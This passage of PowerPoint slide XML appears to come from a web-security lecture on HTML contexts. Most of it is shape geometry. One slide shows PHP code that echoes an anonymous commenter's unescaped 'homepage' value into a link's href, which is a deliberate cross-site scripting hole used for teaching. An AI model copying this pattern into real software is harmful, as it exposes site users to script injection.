              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="object 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9686543" y="4576063"/>
            <a:ext cx="1036320" cy="916940"/>
            <a:chOff x="7264907" y="3432047"/>
            <a:chExt cx="777240" cy="687705"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29" name="object 29"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7264907" y="3432047"/>
              <a:ext cx="777240" cy="687323"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="object 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7307071" y="3454145"/>
              <a:ext cx="579755" cy="489584"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="579754" h="489585">
                  <a:moveTo>
                    <a:pt x="468629" y="444411"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="462025" y="449059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459739" y="462889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464311" y="469455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579627" y="489242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577308" y="482765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552196" y="482765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516226" y="452584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468629" y="444411"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="579754" h="489585">
                  <a:moveTo>
                    <a:pt x="516226" y="452584"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="552196" y="482765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556772" y="477329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548385" y="477329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541018" y="456841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516226" y="452584"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="579754" h="489585">
                  <a:moveTo>
                    <a:pt x="532892" y="375665"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="519683" y="380491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516254" y="387730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518541" y="394334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532444" y="432997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568578" y="463308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552196" y="482765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577308" y="482765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542544" y="385698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540130" y="379094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532892" y="375665"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="579754" h="489585">
                  <a:moveTo>
                    <a:pt x="541018" y="456841"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="548385" y="477329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562482" y="460527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541018" y="456841"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="579754" h="489585">
                  <a:moveTo>
                    <a:pt x="532444" y="432997"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="541018" y="456841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562482" y="460527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548385" y="477329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556772" y="477329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568578" y="463308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532444" y="432997"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="579754" h="489585">
                  <a:moveTo>
                    <a:pt x="16255" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="19430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516226" y="452584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541018" y="456841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532444" y="432997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16255" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="object 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4771137" y="4326127"/>
            <a:ext cx="3213100" cy="607907"/>
            <a:chOff x="3578352" y="3244595"/>
            <a:chExt cx="2409825" cy="455930"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32" name="object 32"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId13" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3578352" y="3244595"/>
              <a:ext cx="2409444" cy="455676"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="object 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3733800" y="3266566"/>
              <a:ext cx="2211705" cy="305435"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2211704" h="305435">
                  <a:moveTo>
                    <a:pt x="93852" y="187959"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="257682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106934" y="305180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114426" y="302259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117221" y="295782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120141" y="289432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117221" y="281939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110744" y="279145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84720" y="267588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26415" y="267588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23622" y="242315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70100" y="237161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103377" y="212470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109092" y="208406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110236" y="200405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106045" y="194817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101853" y="189102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93852" y="187959"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2211704" h="305435">
                  <a:moveTo>
                    <a:pt x="70100" y="237161"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="23622" y="242315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26415" y="267588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49317" y="265048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32512" y="265048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30099" y="243331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61782" y="243331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70100" y="237161"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2211704" h="305435">
                  <a:moveTo>
                    <a:pt x="73068" y="262414"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="26415" y="267588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84720" y="267588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73068" y="262414"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2211704" h="305435">
                  <a:moveTo>
                    <a:pt x="30099" y="243331"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="32512" y="265048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49919" y="252134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30099" y="243331"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2211704" h="305435">
                  <a:moveTo>
                    <a:pt x="49919" y="252134"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="32512" y="265048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49317" y="265048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73068" y="262414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49919" y="252134"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2211704" h="305435">
                  <a:moveTo>
                    <a:pt x="2208403" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="70100" y="237161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49919" y="252134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73068" y="262414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2211197" y="25272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2208403" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2211704" h="305435">
                  <a:moveTo>
                    <a:pt x="61782" y="243331"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="30099" y="243331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49919" y="252134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61782" y="243331"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 3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807" y="450638"/>
            <a:ext cx="5362787" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Contexts</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-73" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="731520" y="2488184"/>
            <a:ext cx="7657253" cy="307339"/>
            <a:chOff x="548640" y="1866138"/>
            <a:chExt cx="5742940" cy="230504"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="548640" y="1866138"/>
              <a:ext cx="243840" cy="230504"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="243840" h="230505">
                  <a:moveTo>
                    <a:pt x="243840" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243840" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243840" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FCF8E2"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="792480" y="1866137"/>
              <a:ext cx="5131435" cy="230504"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5131435" h="230505">
                  <a:moveTo>
                    <a:pt x="733031" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="611124" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121920" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121920" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611124" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733031" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733031" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5131435" h="230505">
                  <a:moveTo>
                    <a:pt x="2077199" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1709928" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1222248" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733044" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733044" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1222248" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1709928" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2077199" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2077199" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5131435" h="230505">
                  <a:moveTo>
                    <a:pt x="5131308" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5131308" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2077212" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2077212" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5131308" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5131308" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FDFBF5"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5923787" y="1866138"/>
              <a:ext cx="367665" cy="230504"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="367664" h="230505">
                  <a:moveTo>
                    <a:pt x="367284" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367284" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367284" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FCF8E2"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="1622551"/>
            <a:ext cx="10049933" cy="1161280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> blogging</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>accepts</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13"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‘homepage’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>anonymous </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-579" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>commenter.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> The application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>uses</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>display</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>helpful</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>link:</a:t>
            </a:r>
            <a:endParaRPr sz="2667">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2485"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"&lt;a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>href='"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$homepage</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
